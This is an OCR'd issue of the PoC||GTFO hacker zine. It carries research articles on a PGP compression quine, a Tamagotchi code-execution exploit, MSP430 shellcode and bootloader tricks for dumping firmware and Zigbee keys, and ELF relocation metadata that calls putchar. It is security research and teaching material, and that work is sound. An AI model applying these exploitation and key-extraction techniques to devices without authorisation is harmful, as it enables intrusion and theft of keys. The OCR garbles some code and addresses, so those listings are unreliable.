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are awesome! It was produced by samizdat from the freely available pocorgtfo02.pdf. Neighbor, you have our 
blessing to copy this as you like. Yodel it, preach it, doodle it, and share this gospel with the whole of creation, 
'cause we don't give a shit. 


1 Call to Worship 


Please join me in reading this third issue of the International Journal of Proof of Concept or Get the 
Fuck Out, a friendly little collection of articles for ladies and gentlemen of distinguished ability and taste 
in the field of software exploitation and the worship of weird machines. If you are missing the first two 
issues, we the editors suggest pirating them from the usual locations, or on paper from a neighbor who 
picked up a copy of the first in Vegas or the second in бао Paulo. 

This edition is written to the fine neighbors of the Chaos Computer Club in honor of their thirtieth 
congress, to be held this December in Hamburg. As in prior issues, you'll find plenty of pwnage, some 
neighborly preaching, and no politics. 

In Section 2, Pastor Laphroaig preaches that in the tradition of Noah and of Howard Hughes, we 
should build our own fucking birdfeeders. 

Brother Myron Aub takes a break from his evangelical promotion of Graphitics to teach us a little 
about the PGP Message format in Section 3. It turns out that RFC 4880 gives him just enough room 
to encode an LZ-compression quine within a message, and the PGP interpreter is just “smart”! enough 
to keep decoding it ’till the cows come home. Perhaps other weird machines remain to be found? 

Natalie Silvanovich shares in Section 4 her techniques for reliably dropping shellcode into the Tam- 
agotchi's 6502 controller from malicious plugin cartridges. Her exploit requires a number of nifty tricks, 
not least of which is that the some bits of the program counter are ignored in this architecture, so her 
victim executes the right code from the wrong address! It is feared that this technology might be used 


! Because things marketed as “smart” usually aren't, at least not for the buyer's benefit. Truly, the world does occasionally 
need reminding that stupid is as stupid does. 


by the Royal Canadian Mounted Police to fuel a Cyber War of 1812 against the State of New Hampshire 
and the People's Republic of Vermont. Both American and Canadian neighbors can rest assured that 
this one would have the same winner as the original, Non-Cyber War of 1812. 

Travis Goodspeed shares a grab-bag of tricks for exploiting microcontrollers in Section 5. Learn how 
to combine а Write and a Checksum primitive with weirder properties of Flash memory into a bitwise 
Read primitive when exploiting microcontrollers, how to NOP-out instructions without erasing Flash 
pages, and how to use bootloader ROMs for a return-to-libc attack. 

Bx Shapiro had a nifty article in PoC||GTFO 0:5 in which she showed out to return from ELF to libc. 
That article ended with a challenge to our readers, asking you fine folks to figure out how in living hell 
parameters could be passed to the function beging called. In Section 6, she rises to her own challenge, 
showing you how to call putchar() from an ELF Weird Machine without having any of your own native 
code. 

Dave Weinstein in Section 7 explains why POKE 62975, 0 will brick a Trash 80 Model 100 until that 
poor machine is put out its misery by a cold reset. Feel free to try it out in your emulator and consider that 
many Automatic Exploit Generators aren't very good at predicting the effects of a write-once-anywhere 
vuln. 

Ange Albertini explains the internal organization of this issue's PDF in Section 8. Curious readers 
might want to run gemu-system-i386 -fda pocorgtfo02.pdf in order to experience all the neighbor- 
liness that this issue has to offer. 

In PoC||GTFO 01:02, Dan Kaminsky shared with us а 4-line RNG for Javascript, challenging our 
readers to exploit it. It had no whitening, no scrambling, and no other defenses, so any weakness in the 
principle ought to have been exploitable. In proper PoC||GTFO fashion, Joernchen demonstrates such 
a vulnerability in Section 9, by observing that some versions of Firefox bias toward producing bytes of 
low Hamming weight. 

Section 10 contains Ben Nagy's latest masterpiece, sure to get you, dear reader, on all sorts of 
watchlists. We half-heartedly apologize in advance to any of our readers at spooky agencies who have to 
explain having this magazine to their employers. 

Finally, in Section 11, we do what churches are best at and pass the collection plate. Please consider 
giving alms of 0day and PoC to those who are poor in spirit. 

Artwork in this issue was created by Ra of Tama-Zone, Stefan Bauwens, and others. The painting 
featured in the museum on page 31 is in remembrance of the one first drawn by Mirromaru in red creeper 
cards at the 29th Congress, then quickly censored due to controversy. 











We the editors are aware that some of the illustrations might be offensive to our more sensitive 
readers, either for reasons of vulgarity or blasphemy. In both cases, we rely on the Bill Hicks Defense. 

“Buddy, we're Christians, and we don't like what you said.” 

“So forgive me!” 
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2 А Parable оп the Importance of Tools; ог, 
Build your own fucking birdfeeder. 


an epistle from the Rt. Rvd. Pastor Manul Laphroaig, 
for the Beloved Congregation of the First United Church of the Weird Machines. 


Grace and Peace to you! 

Once there was a wine-maker named Noah, the sort of fella you'd 
be happy to share а beer with. He made damned good wine, but one 
day he started building a boat. 

“Why are you building that?" they'd ask, “Are the voices in your 
head telling you that it's gonna rain?" 

“Море,” he'd say, “Just toolin’ around.” 

They showed him yacht catalogs and boating magazines. “Look, 
man, you can just buy one at the store.” 

“Haven’t got the money," he'd say and then get back to building 
the frame or bending boards for the hull. 

“Well, you could afford to rent a boat for the weekend.” 

Now Noah was a patient guy, but everyone has his limit. “I’m 
building my own fucking birdfeed,” he’d say, “because they’ve got wood 
at the store.” 

And there was a fella named Howard Hughes, a crazy old millionaire. 
Back in the thirties, he built his own air force to film a movie about 
the first World War, so during the forties, when Roosevelt needed an 
air force of his own, he bought Howie’s. 

Howie Hughes built other birdfeeders. He made the H4 Hercules, 
the world’s largest airplane and a damned big boat, out of wood. It 
was five stories tall with a hundred meter wingspan. First flying in 
1947, nothing approaching its size was seen for another forty years. 

During the cold war, when the CIA wanted to recover a sunken 
Soviet submarine, K-129, they called ol’ Howie up. “Howie,” they said, 
"We've gotta keep this real quiet. Don't tell anyone.” 
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So the next day, Howard Hughes held a press conference! “There are giant blobs of copper on the 
ocean floor,” he lied, “and I’m building a big-ass boat with a big-ass crane to pick them up and drop 
them on the deck. It'll be so efficient that ГЇЇ put the other copper mines out of business.” 

5o while folks were scrambling to invest in his copper company and divest from the real ones, Howie 
built the Hughes Glomar Explorer. True to his word it was a big-ass boat with a big-ass crane, but 
instead of picking up copper blobs it lifted that submarine off the ocean floor and dropped it on the 
deck. 

How could he do these things? Because he built his own fucking birdfeeders, that's how. 

So when you're tooling around with a from-scratch tool, your own hex editor or interactive disassem- 
bler, and your neighbors tell you to use 010 or to use IDA or to use this or use that, do what Noah and 
Howie would do. Look 'em in the eye and say, 


‘Tm building my own fucking birdfeeder." 





Pastor Laphroaig tells us that when the streams of our computation are unclear, 
it's often because the SEO Experts are enjoying their goats upstream. 





Pastor Laphroaig says to the SEO Experts, 
“Not with my flock!” 


3 А PGP Matryoshka Doll 


Take out your favourite matryoshka doll, neighbour. Now piece by piece, 
open it until you can open it no longer. Every piece is smaller and closer 
to the end of the experience, and then—it stops: you can open the smallest 
piece no more. 

But beware, neighbour! Not all matryoshka dolls behave like this. Some 
matryoshka craftsneighbours are tempted by the devil's lures. They see no 
farther than the devil’s unholy promises of extensibility and compactness 
when they craft a matryoshka doll that can compress a larger one to fit 
within it! And our good neighbour Phil Zimmerman fell prey to this lure 
when designing the PGP doll format.? 

When you want to send a message, you must first stuff it into a literal doll. 
You can then enclose that in an encrypted doll, a signed doll, or a compressed 
doll. How do you assemble these together? However you please! You can 
put your literal doll inside а signed doll inside an encrypted doll inside a 
compressed doll. Naturally, ciphertext compresses poorly, so this would be 
a stupid way to nest a PGP matryoshka doll. Normally you put your literal 
doll inside à signed doll inside à compressed doll inside an encrypted doll, 
but you can do it stupidly if you like. 

And how do you open а PGP matryoshka doll? Since the sender could 
have assembled it however they pleased, you must be ready for anything. 
If you see an encrypted doll, you decrypt it and open the enclosed smaller 
doll. If you see a signed doll, you verify its signature—throwing it away if it 
fails to verify—and open the enclosed smaller doll. If you see a literal doll, 
you're done and you read the message. 

But what if you get а compressed doll? You decompress it—and hope 
there are no vulnerabilities in your system's zlib—but unless some idiot tried 
to compress ciphertext, the enclosed doll will be bigger than the doll you 
just opened. 

‘Surely,’ you say, ‘if someone assembled a PGP doll for me, it must have 
a literal doll buried inside it" But no, my poor, naive neighbour! There 
is no rule that all PGP dolls be assembled like that. With the help of our 
neighbourly neighbour Russ Cox,? and with a dab of holy water to dispel 
the devil's temptations to misuse this black magic, we can craft a voodoo 
PGP doll from a quine, a self-reproducing program written in the Lempel-Ziv 
compression language, that bites any who naively try to open it up. 

Our neighbour Tavis Ormandy discovered similar unholiness in IPsec. 
What other matryoshka dolls can you turn into voodoo dolls, good neigh- 
bour? 
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^RFC 4880, ‘OpenPGP Message Format?’ 
?Russ Cox, ‘Zip Files All the Way Down’, 2010-03-18 


^Tavis Ormandy, ‘BSD derived ВЕС 3173 IPcomp encapsulation will expand arbitrarily nested payload’, CVE-2011- 


1547, posted to full-disclosure 2011-04-01 


by Brother Myron Aub 


IT ALL ADOS UP TO 
EDUCATIONAL 


CC 


The creators of the original Pocket 


fun-filled new game boo 
that incredible machine mi has found a 
place in aimost every 


THE KIDS' POCKET CALCULATOR 

GAME BOOK 

by Edwin ed and 

John Broc 

A quick s үг elementary mathe- - 
matics — fun and games with real DADOS 
The first book of its kind for kids fro 
kindergarten through D pid strated 
with tine drawings and cartoon 

$6.95 hardcover $3.95 газовата 


МЕ POCK Ee», 


cu 
РУДЕ ВОО 
ЧУ? Jii 


. THE POCKET CALCULATOR 


by Edwin свег апа 

John Brock 

Even more ‘popular in E tun its 
famous predecessor, this boo 

simpler, more accessibie, and [S games 
are more mathematically ba bas 

а with line drawings nd 


cartoons. 
$6.95 Кога $3.95 paperbound 


[WILLIAM MORROW 








Hey kids! Can you reverse engineer this shellcode from the picture? 


4 Reliable Code Execution on a Tamagotchi 
by Natalie Silvanovich 


Tamagotchis are an excellent target for reverse engineering for a number of reasons: They have 
a limited number of inputs and outputs, they run on а poorly documented 6502 microcontroller and 
they're, well, Tamagotchis. Recently, I discovered a technique for reliably executing foreign code on a 
Tamagotchi. 

Let's begin at the beginning. Modern Tamagotchis run on a GeneralPlus GPLB52X LCD controller, 
a lightweight 6502 controller that uses an internal mask ROM for all code and some data. This means 
that exploitation is necessary to free the Tamagotchi from the shackles of its read-only code. Also, in 
the absence of any debug outputs, code execution provides valuable insight into the internals of the 
Tamagotchi and its MCU. 

There are four inputs into a Tamagotchi that can be manipulated by the user. (1) The buttons, (2) the 
EEPROM that saves the Tamagotchi state across resets, (3) the IR interface and (4) certain accessories 
containing external SPI memory called figures. Attempts to find useful bugs in the EEPROM and IR 
interface were unsuccessful, so I moved onto the figures. Eventually I found an exploitable bug in how 
the Tamagotchi processes figure data. 

When attached to a Tamagotchi, figures add extra functionality, 
such as games or items. 5o attaching a figure might allow your Tam- 
agotchi to play shuffleboard, purchase а vacuum cleaner or attend 30c3. 
The bug I found was in the processing of game data. Game logic is not 
actually included in the figure data; rather, the figure provides an in- 
dex to the game logic in the Tamagotchi's mask ROM.? Changing this 
index causes some very strange behavior. If the index is an expected | 
value, from 0 to about 0x20, а game will be played as expected, but for Complete System 
higher indexes, the device will freeze, requiring a reset. Even stranger, in a case! 
if the index is very high (OxD8 or higher), the Tamagotchi jumps to || KEYBOARD: 62 key upper & lower case + Greek; 
a different, valid screen, such as feeding the ‘Tamagotchi or giving it à || TAPE INTERFACE: High speed, 1200 Baud! Cas- 
bath, and the Tamagotchi functions normally afterwards. This made и 
me suspect that the game index was used as an index into a jump table || MICROPROCESSOR: 6502 based system 
and that freezing was due to jumping to an invalid location. ЕДРИТЕ mu ies 

With no way to gain additional information about the cause of || 79797 3K ROM sockets: 
the behavior, and about 200 possible vulnerabilities, it made sense 





VIDEO INTERFACE: Е.А. Compatible; 


) S.T.M. SYSTEMS INC. S, Fx 
to to fill up as much memory as possible up with a NOP sled, try all ,9? PO RO a% W о 


Mont Vernon, N.H. 03057 





possible indexes, and hope that one caused a jump to the right location. 
Unfortunately, the only memory controllable by the figure is the LCD 
RAM, so I filled that with NOPs and shellcode. (The screen data starts 
at 0х1С80 in the figure memory, and maps to 0х1000 in the Tamagotchi memory, for people trying this 
at home.) After several tries and some fiddling the shellcode, index OxD4 lead to very unreliable code 
execution. This code execution allowed me to perform a complete ROM dump of the Tamagotchi, which 
in turn led to the ability to better analyze the bug. 

The following code contains the vulnerability. Please note that the current state (current state 22) 
is set from the game index without validation. 


seg004:4E2E LDA byte 1A4 
seg004:4E31 ВЕС) loc 44E39 
seg004:4E33 LDA gameindex2 
seg004 :4E36 JMP loc 44E3C 
seg004:4E39 LDA gameindex1 
seg004:4E3C CLC 

seg004:4E3D ADC #5927 3 

seg004 :4E3F STA current state 22 
seg004:4E41 JMP locret 44E4C 


©The important index is located at address 0x18 in figure memory. 


The main Tamagotchi execution loop checks the state based оп a timer interrupt, then makes a state 


transition if the state has changed. The state transition is as follows. 


ROM: EFE8 LDX current state 22 
ROM: EFEA LDA SFOOE ,X 

ROM: EFED STA change page 

ROM: EFFO STA current page 
ROM: EFF2 BEQ loc F001 

ROM: ЕЕЕ4 LDA #0 

ROM: EFF6 STA off 34 

ROM: EFFS LDA 4$40 ; 'Q' 

ROM: EFFA STA off 3441 

ROM: EFFC LDA current state 22 
ROM: EFFE JMP (off 34) 





In essence, the Tamagotchi looks up the page of the state in a ta- 
ble at OxFOOE, then jumps to address 0x4000 in that page. Look- 
ing at this code, it is clear why my first exploit was unreliable. 
0х04 + OxFOOE + 0x27 is OxF109, which resolves to a value of Ox3c. 
Since the Tamagotchi only has 19 pages, this is an invalid page number. 
Testing what would happen if the MCU was provided an invalid page, 
addresses 0x4000 and up resolved to OxFF. 

This means that there are two possibilities of how this exploit works. 
Either the memory addresses are floating and sometimes end up with 
values that, when executed, send the instruction pointer to the LCD 
RAM, or the undefined instruction OxFF, when executed, puts the 
instruction pointer into the right place, sometimes. Barring bizarreness 
beyond my wildest imagination, neither of these possibilities would 
allow for the exploit to be made more reliable though manipulation of 
the figure data. 

Instead, I looked for a better index to use, which turned out to be 
OxCD. OxCD + OxFOOE + 0x27 is OxF102, which maps to part of the 
LCD segment table, which has a value of 4. Jumping to 0x4000 in page 
4 immediately indexes into another page table. 
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seg004:4000 LDA #80 

seg004:4002 STA $34 

seg004:4004 LDA #$40 ; 'Q' 
seg004:4006 STA $35 

seg004:4008 LDA $22 

seg004:400A JMP jump into table D27F 


This index is also out of range, and indexes into a code section: 
seg004:41F5 INC $11E 


Interpreted as а pointer, however, this value is OXIEEE. The LCD RAM range is from 0x1000 to 
0x1200, but fortunately, bits 2-7 of the upper byte of addresses in the 0x1000-0x2000 range are ignored, 
so reading Ox1EEE returns the value at OxX10EE. This means that playing а game with the index of 0xCD 
will execute code in the LCD RAM every time! 

While reading POC||GTFO obligates you to share a copy with a neighbour, trying this on your own 
Tamagotchi is only strongly recommended. Further instructions can be found by unzipping the PDF of 
this issue. 





“The ancient teachers of this science promised impossibilities and performed nothing. The modern 
masters promise very little; they know that metals cannot be transmuted and that the elixir of life is a 
chimera but these philosophers, whose hands seem only made to dabble in dirt, and their eyes to pore 

over the microscope or crucible, have indeed performed miracles. They penetrate into the recesses of 
nature and show how she works in her hiding-places. They ascend into the heavens; they have 
discovered how the blood circulates, and the nature of the air we breathe. They have acquired new and 
almost unlimited powers; they can command the thunders of heaven, mimic the earthquake, and even 
mock the invisible world with its own shadows." — Shelley 3:16 





5 some Shellcode Tips for MSP430 and Related MCUs 


by Travis Goodspeed 


Howdy y'all, 

I'm writing this to introduce you as an exploiter of desktops and servers to some of the tricks that 
I've used in writing shellcode for microcontrollers, with examples from the М5Р430 in particular. You 
can try most of these examples on a GoodFET or Facedancer board, and many of them are portable to 
other embedded targets, such as AVR or the lower-end ARM devices. 





5.1 Flash Patching is Weird 


In Unix and Windows, you are used to processes operating within virtual memory. On a microcontroller, 
they often run directly in physical memory, so the rules are rather different. It helps to take the German 
approach, learning all of the rules to get away with things that ought to be illegal. 

The first difference you’ll run into on the MSP430 is that code runs in-place from Flash memory. Flash 
has some very different rules from RAM, because it’s a different technology and a proper programmer 
knows better than to rely on layers of abstraction. 


e Flash is erased to ones as segments or globally, never as bytes or words. 
e Flash writes clear bits at word granularity, but can’t set them. 


e Flash writes require a safety password to be written into a register. 


Thus, to do a normal write to Flash, an MCU programmer is taught to first disable the Flash write 
protection and configure the right special-function registers, then erase the entire page, then rewrite 
the entire page. Many programmers never bother, opting for an external memory chip or relying on 
battery-backed RAM. 

To make smaller changes, there’s another option. After disabling Flash, a neighbor could clear 
individual bits rather than rewriting the entire page. This is handy for regular developers to do what’s 
called EEPROM Emulation, which emulates memory that can be written bytewise, but it’s also damned 
useful when patching code in-place. 
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Figure 1: MSP430 Instruction Set, from the MSP430X2xx Family User’s Guide 


For example, Figures 1 and 2 show that 0x3Cxx is an unconditional Jump while 0x38xx is a conditional 
Jump if Less Than instruction. If we overwrite a JMP instruction with Ox3BFF, it will have the effect 
of bitwise ANDing that instruction with Ox3BFF, changing the 3C opcode to a 38 while retaining the 
jump offset. 
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10-Bit PC Offset 


Figure 2: MSP430 Jump Instructions, from the MSP430X2xx Family User's Guide 


Since MSP430 instructions are 16-bit word aligned, the 10-bit PC offset is multiplied by two and 
then added to the program counter. Ox3FFF is an unconditional jump backward by one word, or an 
unconditional infinite while loop. If you zero-out the offset by overwriting the instruction with 0x3C^00, 
you can turn any jump instruction into a NOP. 

When attacking a poorly protected bootloader, you might find yourself with the ability to write and 
to checksum, but not to read. If you can write without erasing, then writing all 1's with a single 0 will 
change the checksum if and only if that bit previously was a 1. Repeating for each bit of Flash is slow, 
but it might get you a firmware dump. 





5.2 Efficient Shellcode 


Quite often, the first thing you'll do with shellcode is to dump out the 
state of the microcontroller being attacked. It’s worth studying ways 
to make that code in as few bytes as possible, as a microcontroller 
generally processes very small packets and you won’t have room for 
anything fancy. «КЕТ - 
: : А о a. = 

То quickly dump memory on an architecture that you don t know — Tw he B = 
very well, it helps to have simple code that already has its environment M | 
configured. Тће code should be completely oblivious to timing, and it 
should access as few structures as possible. It should also be portable, 


pm 
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5.9 Mask ROMs have Useful Gadgets 


In my WOOT ’09 paper with Aurélien Francillon, we toyed around with using the MSP430's BSL 
(BootStrap Loader) ROM to aid in exploiting an unknown executable. That paper concerns exploiting 
firmware without having a copy, but I'll recount one of its tricks here. 

The MSP430 BSL has two entry points. The first is the Hard Entry Point, whose address is always 
stored at 0x0C00. By twiddling the reset and test pins with proper timing, the chip will boot from this 
address instead of from the RESET handler in the interrupt table. 

The second entry point is called the Soft Entry Point, and it is rather poorly documented. The 
original idea was that a program could return into the bootloader ROM by branching to the address 
stored at 0x0C02, with some of the initialization routines skipped. One of these routines is the instruction 
that initializes the register holding password protection, so by setting or clearing a bit in that register, 
the calling application can enable or disable password checking. 

While the soft entry point is sometimes useful to an MSP430 developer, it's damned useful for an 
attacker. On an MSP430F1612, my favorite shellcode for dumping firmware is a bit like the following, 
which assembles to just six bytes of memory. 


mov #0xFFFF, rll :; Disable BSL password protection. 
br &0x0c02 >: Branch to the BSL Soft Entry Point 


©Half-Blind Attacks: Mask КОМ Bootloaders are Dangerous, WOOT 2011, Goodspeed and Francillon 
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5.4 Unused RAM is Not Erased at Reboot 


In larger machines, memory which is not used by a process is not mapped into that process’s virtual 
memory. In microcontrollers, it is still accessible, since the code is running with physical rather than 
virtual memory. Rather than reset every RAM word during a reboot, most microcontrollers simply leave 
it alone and let the program take care of clearing its values. 

Now an MSP430 application is compiled with a view of memory that it sparingly uses. GCC, for 
example, will allocate code (.text) into Flash from the lowest Flash address in its linker script. 

RAM is only used by the compiler for data, never for code, unless the linker script is carefully and 
intentionally hand-crafted. It is divided into two segments by the linker, .data and .bss. The .data region 
is initialized by copying the data over from Flash, while the .bss region is initialized to zero through a 
simple while() loop. This provides us with two nifty tricks. 

The first trick is that, given a poor POKE gadget, we can slowly place a large chunk of shellcode into 
upper regions of RAM. For example, an MSP430F2618 has enough RAM to fit the GoodFET firmware, 
so a device using that chip could have the GoodFET firmware itself act as second-stage shellcode! Smaller 
chips, such as the MSP430F 2274, could have a Flash driver loaded into unused RAM, with third-stage 
shellcode written into unused Flash. 


5.5 Where Flash is Protected, RAM is Not 


Recalling that unused RAM is never cleared by an application, let’s abuse that behavior in a second way. 

Back in 2010, Texas Instruments released their 
ZStack implementation of Zigbee for use with the 
Smart Energy Profile. I found that the random 














number generator was crap, and they patched that i 13.4 The Intecolor* 8004 Kit 
bug. 5o how was little ol' me supposed to get aw A Complete 8 COLOR intelligent 
more Zigbee Smart Energy Profile keys without a | ке $1,395 
Certicom license? Е 
The remaining vulnerability was a combination 
of the BSL ROM with the ZStack firmware. ZS- "Complete" Means 
| • 8080 CPU • 25 Line x ВО а 4Kx8 RAM / PROM Software 
tack relied upon the BSL ROM and the JTAG : Sockets for UV Erasable PROM 9" Shadow Mask Color CR Tube 
! ee 
fuses to prevent keys and firmware from being read pppoe Baud olde Pack 
out of the device, but the BSL ROM was only in- And you also get the Intecolor* 8001 9 Sector Convergence System for 
d d k d К Ь | d f h d ease of set up (3-5 minutes) and stability. 
= Additional Options Available: 
tended to d COUE РО етв read out ої the de • Roll • Additional RAM to 32K • 48 Line x 80 Characters/Line • Light Pen 
vice A second bug in that Zigbee stack was that a Graphics Mode • • Background Color • Special Graphics Characters 
. ames 
keys were stored in the .data segment instead of ISC WILL MAKE A BELIEVER OUT OF YOU. 
the text segment, SO the firmware would сору the Pj esee 219) Intecolor" 8001 kits at $1,395 plus $15.00 ship- 
е К Enclosed is ту Ш cashier s check, LJ money order, О personal check* 
key from Flash into RAM during startup. -1$350 deposit/kit for C.O.D. shipmentfor$. 6 
Р . NAME 
As a quick recap, the bootloader requires a per ares 
password to run most commands, but some are СИ z ZIP 
“Allow 8 weeks clearance on personal checks. 
unprotected. Among them are the ones to supply Delivery 30-60 days ARO 
a password and the Mass Erase command, which intelligent Systems Corp. 4576 Ridge Gate Drive, Duluth, Georgia 30136 





> R Telephone (404) 449-5961 
wipes all of Flash and resets the password, which 


is stored in Flash, to 32 bytes of OxFF. 

So to get keys out of locked ZStack devices, I just needed to use the serial bootloader, first sending 
the command to Mass Erase and then—without losing power-to supply a password of all OXFF and then 
to dump all of RAM to disk. A little bit of RAM is overwritten by the BSL's call stack, but only the 
lowest 32 bytes. Everything else is saved. 





I hope you find these tricks to be handy. If you'd like to hear more, buy me a nice India Pale Ale. 
— Travis 
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Who would remember Noah if he had just bought а boat from the store? 
Build your own fucking birdfeeder. 
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6 Calling putchar() from ап ELF Мета Machine. 


by Rebecca .Вт Shapiro 


Pastor's Exordium.' Behold the daily miracle of the loader: it takes stored dumb bytes and makes 
them into a new process or splices them into a running one. The Pharisees may dismiss it as mere 
engineering, but verily I tell you, long after their textbooks are forgotten the loader and its Phrack exegesis 
will shine on, for there is more wisdom gathered in its metadata structures than can be found in a dozen 
OS textbooks. 

Yet there is more! The binary metadata structures consumed by the loader are actually a program 
for the loader. A weird machine devotee will readily recognize that these data drive all the actions behind 
the loader’s miracle; they can be thought of as executable bytecode for the loader, which can be thought 
of as a virtual machine. And just as assembly with all its glorious movs, adds, and calls 18 encoded in 
opcodes and offsets, ABI metadata entries are encoded in types and addends, except that they are split 
into symbols and relocation structures, residing 1n different sections of the binary but cross-referenced by 
their entry numbers in the respective sections. 

In this follow-up to earlier work, Bx shares more nifty tricks of programming the ELF loader with 
relocation and symbol data as weird assembly. This work is as advanced as it 1s neighborly, so please read 
her articles from WOOT 2013 and POC||GTFO 00:05 to learn how to build a Turing-complete virtual 
machine out of an ELF loader and how to extend that VM to call native code. In this sermon, Bx shows 
us how to make system calls from ELF relocation and symbol data; full shellcode is left as an exercise to 
the faithful! -PML 





Welcome back, friends. In the first edition of POC||GTFO, I demonstrated how we can craft ELF 
relocation metadata to instruct the loader to make libc calls. The method I demonstrated was fairly 
limited and lacked the ability to do useful things such as control the arguments passed to the called 
function. Thus I ended the article with an unsolved challenge: How can metadata control the arguments 
passed to the metadata-initiated function call? 

In this sermon, I will partially answer that challenge by demonstrating how to control a call to 
putchar() using relocation metadata. 


PUTCHAR (3) bx?/s Programmer’s Manual PUTCHAR (3) 


SYNOPSIS 
#include <stdio.h> 


int putchar(int c); 


DESCRIPTION 
putchar(c) writes the character c, cast to an unsigned char, to stdout. 


RETURN VALUE 
putchar() returns the character written as an unsigned char cast to 
an int or EOF on error. 


puts() and fputs() return a nonnegative number on success, or EOF on error. 


One may ask “why focus on putchar()?" The answer is simple. Because putchar() is required in 
order to implement a full, honest-to-manul brainfuck-to-ELF metadata compiler. You may have noticed 
that putchar() requires only a single (byte-long) argument and have thought to yourself “Т only have 
control over one argument!? How will that help me take over the world?" Don't worry your pretty little 


"How is a sermon like a binary file? Both have prescribed parts that follow each other in a conventional order, but may 
be skipped or used creatively by an extra neighborly preacher. Convention is there to help, but it's the result that matters. 
So just think of exordium as the ELF/ABI header or vice versa and bear with the Preacher as you bear with your binary 
toolchain! —PML 
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nose off. I will provide insight on how you can control not one, not two, but three (ish) arguments to а 
function call! 

Instead of asking how one can control the first argument to a function call, one should really be 
asking how can we be the last to set the RDI register (the first argument to a function as heralded by 
the System V amd64 ABI gospel 3:2:3, aka amd64 calling convention?) before our metadata-driven libc 
function is called. 

It turns out that the loader generally processes each relocation entry within a single function, although 
there are а few exceptions to this rule. This means that, generally speaking, the arguments that are 
in place during any metadata-driven function call are the arguments that were passed to the currently 
executing function processing the relocation entries. An exception to this “rule” occurs when relocation 
entries of type R, X86. 64. COPY are processed. These types of relocation entries cause the loader to 
make a call to memcpy О), thus changing the values of RDI, RSI, RDX, which by convention hold the first 
three arguments to a function call, and in the case of a call to memcpy(void *dest, const void *src, 
size t n) hold dest, src, and size, respectively. 

Now imagine that the dynamic loader has been processing our relocation entries and now the next 
dynamic symbol, pointed to by the next relocation entry rO to be processed, looks like this: 


50 = {..., st value = &putchar, st size = 0х0} 


(Note: We have already shown how to calculate the address of libc functions in past work and will 
not cover how to do that in this sermon. See our WOOT article and POC||GTFO 00:05 for a thorough 
explanation.) 

The following three relocation entries (represented here as C structs, but of course encoded in a .ге1 
section) will make a call to putchar(), to print the character of our choice: 





rO = ir offset-«&r2-»r addend», r symbol-0, r type-R X86. 64 64, 
r_addend=0x0} 

ri = {r_offset=<char to print>, r_symbol=0, r_type=R_X86_64_COPY, 
r_addend=0x0} 

r2 = ir offset-&r2, r symbol-0, r type-R X86 64 IRELATIVE, 
r addend-«&putchar (filled in by r0)» 


The purpose of ко is to write the address of putchar() into r2's addend. The purpose of r1 is to 
setup RDI (the first argument) for r2's function call. When it is processed, memcpy О is called with the 
following arguments: memcpy(<char to print», &putchar, 0). More generally, the call to memcpy О) 
looks like: memcpy (ri-»r offset, sO-»st value, s0-»st size). 

After r1 is processed, 0 byes are copied from &putchar to «char to print»?, and RDI—«char to 
print», RSI=&putchar, and RDX=0. r2, of type R. X86, 64. IRELATIVE, instructs the loader to treat its 
addend as a function pointer, making a call to it(!). How's that for a relocation-based weird assembly 
instruction? But, one problem: relocation entries of type IRELATIVE do not support functions that 
require arguments (meaning that there is no conventional way to pass them). Still, the actual function 
doesn't care and will happily reach for its arguments in RDI etc.—and, luckily, we were able to set up 
the arguments via our relocation-entry crafted call to memcpy O via r1! Hence r2 will cause the loader 
to call putchar О), which will consult RDI to determine what character to print to stdout. 

You may see the potential downfalls of manufacturing a call to memcpy () in order to put arguments 
in place for the following library call. For example, if the third argument is not zero, you need to 
start worrying about your first two arguments pointing to read/writable memory. However, it may be 
comforting to know that the value returned by the function call is written into a spot of your choosing 
(in r2-»r. offset). 

If you would like to further your studies of metadata-driven library calls, please refer to the elf-bf- 
tools repository on github.!Ü May the Great Manul keep and protect you from the Weird Machine. And 
let us say, amen. 


Shttp://www.x86-64.org/documentation/abi.pdf, pages 17-21, Fig. 3.4—and don't ask us in what world RDI, RSI, RDX 
might stand for A, B, C or suchlike. This program may be brought to you by the register RDI anyhow, but let's just say if 
the Manul meets the amd64 Big Bird there might be feathers flying. 

?Note, memcpy would treat it as a destination pointer, but luckily nothing gets copied here, and memcpy implementation 
isn't paranoid about checking its arguments, since a bad pointer would trap anyway. 

10See syscall/putchar in https://github.com/bx/elf-bf-tools . 
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MULTIPLE DATA RATE INTERFACING FOR YOUR CASSETTE AND RS-232 TERMINAL 
The Only S-100 Interface EU о LE 
You May Ever Need 


On one card, you get dependable “КС- 
standard"'/biphase encoded cassette inter- 


facing at 30, 60, 120, or 240 bytes per 
second, and full-duplex RS-232 data ex- 
change at 300- to 9600-baud. Kit, includ- 
ing instruction manual, only $89.95*. 


* Assembled and tested, 
$119.95. Add 5% for 


shipping. Texas resi- 


PERCOM DATA COMPANY, INC. "neri ле 
Молл ОН GARLAND. TEXAS ҮР dents add 596 sales tax. PerCom peripherals for personal computing 


(214) 276-1968 BAC/MC available. 





446 case R. X86, 64 IRELATIVE: 

447 value = map->l_addr + reloc->r_addend; 

448 value = ((El1f64 Addr (ж) (void)) value) (); 
449  *reloc addr = value; 

450 break; 


429case R. X86. 64. COPY: 

430 if (sym -- NULL) 

431 /* This can happen in trace mode if an object could not be (gdb) 
432 found. */ 

433 break; 

434 memcpy (reloc addr arg, (void ж) value, 

435 MIN (sym-»st size, refsym-»st size)); 

436 if (  builtin expect (sym-»st size > refsym-»st size, 0) 


437 || (  builtin expect (sym-»5st size < refsym-»5st size, 0) 
438 && GLRO(dl. verbose))) 
439 { 

440 fmt = ‘‘\ 


441%5: Symbol ‘%s’ has different size in shared object, consider re-linking\n’’; 
(gdb) 

442 goto print err; 

443 } 
444 break; 
44514 endif 


Breakpoint 6, elf machine rela (sym=0x601030, reloc addr arg-0x601241, version=<optimized out», 
reloc=0x601318, map=0x555555773228) at ../sysdeps/x86,. 64/dl-machine.h:434 
434 memcpy (reloc addr arg, (void *) value, 

(gdb) print/x *reloc 

$6 = {r_offset = 0х601241, r info = 0x5, r addend = 0х0} 

(gdb) print refsym->st_size 

$7 = 0 

(gdb) print sym->st_size 

$8 = 0 

(gdb) 

(gdb) print/x reloc_addr_arg 

$9 = 0x601241 

(gdb) x/gx reloc_addr_arg 
0x601241:0x0000000060103800 

(gdb) x/gx value 
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OxTffffíceii84:0x011d8b48f8894153 
(gdb) print/x $rsi 
$5 = Ox7ffff7ce1184 
(gdb) print $rdx 
$10 = 


(after memcpy) 

(gdb) x/gx 0x601241 
0x601241 : 0x0000000060103800 

(gdb) print/x $rdi 

$14 = 0x601241 

(gdb) c 

Continuing. 


